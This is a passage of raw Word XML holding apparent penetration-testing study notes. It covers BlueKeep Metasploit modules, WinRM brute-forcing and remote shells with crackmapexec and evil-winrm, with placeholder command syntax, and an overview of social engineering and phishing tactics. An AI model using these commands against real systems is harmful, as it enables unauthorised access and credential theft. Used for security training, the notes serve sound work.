        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RDP NEEDS TO BE ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE68A7" w14:textId="25B31E73" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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BlueKeep has various illegitimate proof of concepts and exploit code that can be malicious in nature. It is recommended to only utilize verified exploit code and modules for exploitation. This code could be malicious in nature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310040F" w14:textId="7A832A97" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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BlueKeep contains an MSF auxiliary module that can be used to check if a target system is vulnerable, and subsequentially an exploit module is available to exploit the Windows system and give the attacker a privileged meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3B9C0" w14:textId="6C2CA939" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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Targeting kernel space memory can cause system crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB798E" w14:textId="77777777" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FCB2AF" w14:textId="71B4EAFF" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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auxiliary/scanner/rdp/cve_2019_0708_bluekeep”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237BC45" w14:textId="77777777" w:rsidR="009A7EAE" w:rsidRPr="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502C9DFC" w14:textId="04D7EC0A" w:rsidR="009A7EAE" w:rsidRPr="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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exploit/windows/rdp/cve_2019_0708_bluekeep_rce”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBC68B" w14:textId="2705FE98" w:rsidR="009A7EAE" w:rsidRDefault="00A42478" w:rsidP="009A7EAE">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The module</w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> will only run on x64 bit versions of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6E3C7" w14:textId="64D404D9" w:rsidR="00A42478" w:rsidRDefault="00A42478" w:rsidP="009A7EAE">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Specify target configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CE244" w14:textId="4127CF3D" w:rsidR="00A42478" w:rsidRDefault="00A42478" w:rsidP="00A42478">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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show targets”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5305CF98" w14:textId="4DE703AC" w:rsidR="00A42478" w:rsidRPr="00A42478" w:rsidRDefault="00A42478" w:rsidP="00A42478">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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set target (TARGET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37440713" w14:textId="44C27EFA" w:rsidR="00A42478" w:rsidRPr="009A7EAE" w:rsidRDefault="00A42478" w:rsidP="00A42478">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Modify groom size to ensure kernel space is not overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060B8FF" w14:textId="77777777" w:rsidR="00E762E0" w:rsidRPr="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00E762E0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55336563" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC55C16"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inRM – Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A78A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dows remote management protocol that can be used to facilitate remote access with Windows systems over HTTP(S).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA39581" w14:textId="66811BF3"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MSFT implemented WinRM </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">to Windows </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> make life easier for system administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB52D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RM is typically used in the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399638A2"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Remotely access and interact with Windows hosts on a local network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5307649C"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emotely execute commands on the Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB92A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anage and configure Windows systems remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A252227" w14:textId="7EE247AD"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WinRM typically uses TCP </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5985 and 5986 (HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BE8B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nRM implements access control and security for communication between systems through various forms of authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B9751" w14:textId="4B53DF0A"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We can utilize a utilize called “crackmapexec” to perform </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>brute force</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on WinRM </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> identify users and their passwords as well as execute commands on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628A1F1" w14:textId="77777777" w:rsid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e can also utilize a ruby script called “evil-winrm” to obtain a command shell session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E720915" w14:textId="77777777" w:rsidR="00D611D1" w:rsidRDefault="00D611D1" w:rsidP="00D611D1">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C470934" w14:textId="1303CAE5" w:rsidR="00A42478" w:rsidRDefault="00A42478" w:rsidP="00A42478">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Default NMAP port scans may not include port 5985 or 5986, need to do a full -p- scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E82DFA" w14:textId="77777777" w:rsidR="00A42478" w:rsidRDefault="00A42478" w:rsidP="00A42478">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E4571C" w14:textId="010AF573" w:rsidR="005A6416" w:rsidRPr="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>crackmapexec can be used to brute-force and even execute commands on the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04271B44" w14:textId="44D32318" w:rsidR="005A6416" w:rsidRPr="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Evil-winrm can be used to gain a remote shell with the provided credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE56778" w14:textId="4C840808" w:rsidR="005A6416" w:rsidRPr="005A6416" w:rsidRDefault="00A42478" w:rsidP="005A6416">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 xml:space="preserve">“crackmapexec </w:t>
      </w:r>
      <w:r w:rsidR="005A6416">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">winrm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(HOST) -u (USER LIST) </w:t>
      </w:r>
      <w:r w:rsidR="005A6416">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-p (PASS LIST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CFD7C" w14:textId="657F8443" w:rsidR="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">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Administrator account should be targeted as it is usually on there and has the highest level of authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F4957" w14:textId="1B1577A7" w:rsidR="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">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crackmapexec winrm (HOST) -u (USER) -p (PASS) -x (COMMAND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865CF1C" w14:textId="0BA0F77E" w:rsidR="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">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evil-winrm -u (USER) -p ‘(PASS)’ -i (HOST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6EAA0" w14:textId="77777777" w:rsidR="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D79423C" w14:textId="286988A5" w:rsidR="005A6416" w:rsidRPr="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">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exploit/windows/winrm/winrm_script_exec”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308A39B" w14:textId="244BBA70" w:rsidR="005A6416" w:rsidRDefault="005A6416" w:rsidP="005A6416">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Metasploit exploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06848A11" w14:textId="46769238" w:rsidR="00032F48" w:rsidRDefault="00032F48" w:rsidP="005A6416">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Force VBS Module – set to True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626695D1" w14:textId="6C92027D" w:rsidR="00032F48" w:rsidRDefault="00032F48" w:rsidP="005A6416">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Set Username and Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE0645" w14:textId="6049E945" w:rsidR="00032F48" w:rsidRPr="005A6416" w:rsidRDefault="00032F48" w:rsidP="005A6416">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Set up listener by entering in LHOST and LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129E7FD" w14:textId="77777777" w:rsidR="00D611D1" w:rsidRPr="00B1380B" w:rsidRDefault="00D611D1" w:rsidP="00D611D1">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD97823" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SOCIAL ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2B700" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58933E22"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Social Engineering Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C394F7" w14:textId="5F781B62"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Human </w:t>
      </w:r>
      <w:r w:rsidR="00A42478" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> – You are HACKING humans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21368FD0"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o either gain access or to gathering information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537EE5C" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EB2393" w14:textId="77777777" w:rsidR="009344B0" w:rsidRPr="00B1380B" w:rsidRDefault="009344B0" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC02A6C"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echniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028336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mpersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41489271" w14:textId="6A386CFB"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Pretexting – Having a premise to </w:t>
      </w:r>
      <w:r w:rsidR="009344B0" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>deceive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826D058" w14:textId="2C7B1850"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Emotional Pull – Pulling at </w:t>
      </w:r>
      <w:r w:rsidR="009344B0" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>heartstrings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24138AE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rgency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4659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Free stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357AD32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Blackmail/Extortion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44039C4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Quid pro quo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FBF43" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA95B42"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Common Tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EDEB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hishing*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115340D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atering Hole – Impersonate/Spoof to deceive user into clicking on a “trusted” site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB459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aiting – Rubber duckies, USBs that are placed to lure in users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D937E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hysical Access – Manipulate your way into a building, bypass a LOT of defenses if accomplished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D434DED" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1133DF"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Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FFC36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alicious email – reply with information, click on links, download files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF76A7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otentially roped in with urgency, users are more likely to click on something when an urgent deadline is involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCCF6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nvoices, payment orders, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D1FF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ers should understand that they need to check links, line up payment orders with those orders they are aware of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F60FB" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E83D6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ypes of Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26883F1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pear phishing – Targeted phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8D7F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haling – Spear phishing of high-value individuals (C-suite, Board members)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B27960"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mishing – SMS messaging phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E70C6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Vishing – Voice call phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D38B8E" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9DB301"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How Would You Fall for That?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9273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harming – Redirecting web traffic maliciously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91907E" w14:textId="4EF157AD"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Watering Hole – Use a trusted site against </w:t>
      </w:r>
      <w:r w:rsidR="00A5636A" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0160F7C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EC – Business Email Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D99FC" w14:textId="24FE76FE"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Impersonation/Spoofing – Additional Tactic, take advantage of </w:t>
      </w:r>
      <w:r w:rsidR="00A5636A" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8F71F" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328D236F" w14:textId="6155CA33"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Pharming and Spoofing websites are very </w:t>
      </w:r>
      <w:r w:rsidR="00A5636A" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B952B68" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
